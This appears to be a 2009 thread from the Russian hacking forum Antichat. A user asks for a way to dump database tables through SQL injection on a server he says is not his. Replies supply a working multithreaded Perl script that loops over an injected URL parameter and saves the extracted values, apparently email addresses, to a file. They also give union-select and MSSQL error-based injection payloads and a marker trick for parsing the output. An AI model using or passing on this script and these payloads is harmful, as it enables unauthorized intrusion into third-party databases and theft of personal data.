ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Терасрочно...Нужен дампер содержимого таблиц.
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Терасрочно...Нужен дампер содержимого таблиц.
  #1  
Старый 23.02.2009, 14:32
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию Терасрочно...Нужен дампер содержимого таблиц.
Срочно нужен дампер содержимого таблиц MySql,либо mysql/mssql/n,где n - любая бд кроме MySql.С Велли плюсеги и храм впридачу )
 
Ответить с цитированием

  #2  
Старый 23.02.2009, 14:43
Shadow_p1raT
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897

Репутация: 267
Отправить сообщение для Shadow_p1raT с помощью ICQ
По умолчанию
Код:
http://sypex.net/products/dumper/downloads/
 
Ответить с цитированием

  #3  
Старый 23.02.2009, 14:46
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Эм...Я так понял,что это локальный дампер,а нужен удалённый(типа SIPTа).Извиняюсь за внесённую дизинформацию)
 
Ответить с цитированием

  #4  
Старый 23.02.2009, 14:50
Shadow_p1raT
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897

Репутация: 267
Отправить сообщение для Shadow_p1raT с помощью ICQ
По умолчанию
просто отредактируй в скрипте строчку
PHP код:
// mysql сервер
define('DBHOST''localhost:3306');
// Базы данных, если сервер не разрешает просматривать список баз данных,
// и ничего не показывается после авторизации. Перечислите названия через 
на нужную тебе

UPD:
ну или вот

Код:
http://mentat.sibintercom.ru/Nemo/dump/rst_sql.txt
Последний раз редактировалось Shadow_p1raT; 23.02.2009 в 14:56..
 
Ответить с цитированием

  #5  
Старый 23.02.2009, 14:56
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Так я ж не знаю акка от бд =_=.К тому же,она на локалхосте...Установить на сам сервер я не могу её(на удалённый,НЕ мой).Я правильно понял ?
 
Ответить с цитированием

  #6  
Старый 23.02.2009, 14:57
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
Ты хочешь через sql-injection сдампить?
 
Ответить с цитированием

  #7  
Старый 23.02.2009, 15:02
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Да
 
Ответить с цитированием

  #8  
Старый 23.02.2009, 15:03
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
ставишь ActivePerl
сохраняешь код в scr.pl
Код:
#!/usr/bin/perl

use strict;
use LWP 5.64;
use LWP::UserAgent;
use threads; #( 'exit'  => 'threads_only' );

print "\nTest file - ";
open(FH, ">>test") and print '[ok]' or print '[!!]';
close(FH);

if(!(defined(@ARGV))){
    usage();
}
else{
    start(@ARGV);
}

sub start{
    my $sh = 1;
    my $repeat = pop @ARGV;
    my $maxthreads = pop @ARGV;
    my $deflink = pop @ARGV;
    my $tmp = 1;
    while($repeat--){
        my $link;
        ($link = $deflink) =~ s/_sh_/$sh/;
        if($tmp < $maxthreads){
            $sh++;
            threads->create(\&getr, $link)->detach;
        }
        else{
            $sh++;
            threads->create(\&getr, $link)->join;
            $tmp = 1;
        }
        $tmp++;
    }
}

sub getr{
    my $ua = LWP::UserAgent->new;
    $ua->agent("Firefox/2.0");
    print "\nUrl in thread: $_[0]";
#   my $resp = $ua->get($_[0]);
    my $resp = HTTP::Request->new(GET => $_[0]);
#  $resp->content_type('application/x-www-form-urlencoded');
    my $res = $ua->request($resp);
#    print "\nGET - [ok]" if $res->is_success;
#    print "\nGET - [!!]" if !$res->is_success;
    if($res->content){
#   open(FH, ">>content.txt");
# print FH $res->content, "\n\n\n===============================\n\n";
#    close(FH);
#        my @cont = split(/\n/, $res->content);
        my @maillist;
#       for (@cont){
            if($res->content =~ m/[^']+/){
                push @maillist, ($res->content =~ m/nvarchar value '([^']+)' to data/gmi);
                print "\nMail: ", join("\n", (m/[^']+/g)), "\n";
	    }
#       }
        open(FH, ">>maillist.txt");
        for (@maillist){
            print FH "$_\n"
        }
        close(FH);
    }
#   threads->exit();;
}

sub usage{
    print "\n\nCoded by unrealm. for PSIH ;) ICQ: 907912";
    print "\nUsage: perl scr.pl link max_threads max_sh";
    print "\nExample: perl scr.pl http://example.ru/1.php?a=_sh_&param=12 10 100\n";
    exit;
}
Настраиваешь ответы
т.е
push @maillist, ($res->content =~ m/nvarchar value '([^']+)' to data/gmi);

запускешь из cmd
example:
Цитата:
scr.pl "http://site.com/index.php?a=id+union+select+name+from+users+limit+ _sh_,1" 10 999
_sh_ - переменная, скрипт будет её перебирать
10 - число потоков
999 - До скольки перебирать _sh_
Последний раз редактировалось aka PSIH; 23.02.2009 в 15:07..
 
Ответить с цитированием

  #9  
Старый 23.02.2009, 15:15
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
push @maillist, ($res->content =~ m/nvarchar value '([^']+)' to data/gmi);

Это два ответа или один ? Как это понять ? Например,при существовании таблицы ответ "yes",а при её отсутствии - "no".Как это записать ? Остальное вопросов не вызывает.

ЗЫ: Сам вывод у меня идёт такой:

select username from users where username=тут_вывод

ORDER by t.priority, t.id ASC
(script.php, 369)

Вывод находится в исходниках страницы.
Последний раз редактировалось Велемир; 23.02.2009 в 15:17..
 
Ответить с цитированием

  #10  
Старый 23.02.2009, 15:21
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию
епт, ну допустим запрос
Цитата:
http://site.com/index.php?if=1+or+1=(select+top+1+table_name+from+ information_schema.tables)--
Возвращает тебе:
Цитата:
Conversion failed when converting the nvarchar value 'Users' to data type int.
Тебе нужно Users, вот и пишешь
nvarchar value ' и ' to data type

Цитата:
ЗЫ: Сам вывод у меня идёт такой: select username from users where username=тут_вывод
Ну вот и смотришь что у тебя слева и справа стоит:
push @maillist, ($res->content =~ m/username=([^']+)то что с права/gmi);

Можно еще так сделать
concat_ws(0x72747274727472,0x3a,username,0x3a,0x72 747274727472)
0x72747274727472 = rtrtrtr
тогда
push @maillist, ($res->content =~ m/rtrtrtr: ([^']+):rtrtrtr/gmi);
Последний раз редактировалось aka PSIH; 23.02.2009 в 15:25..
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Генерация Rainbow таблиц melco Расшифровка хешей 5 02.11.2006 04:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ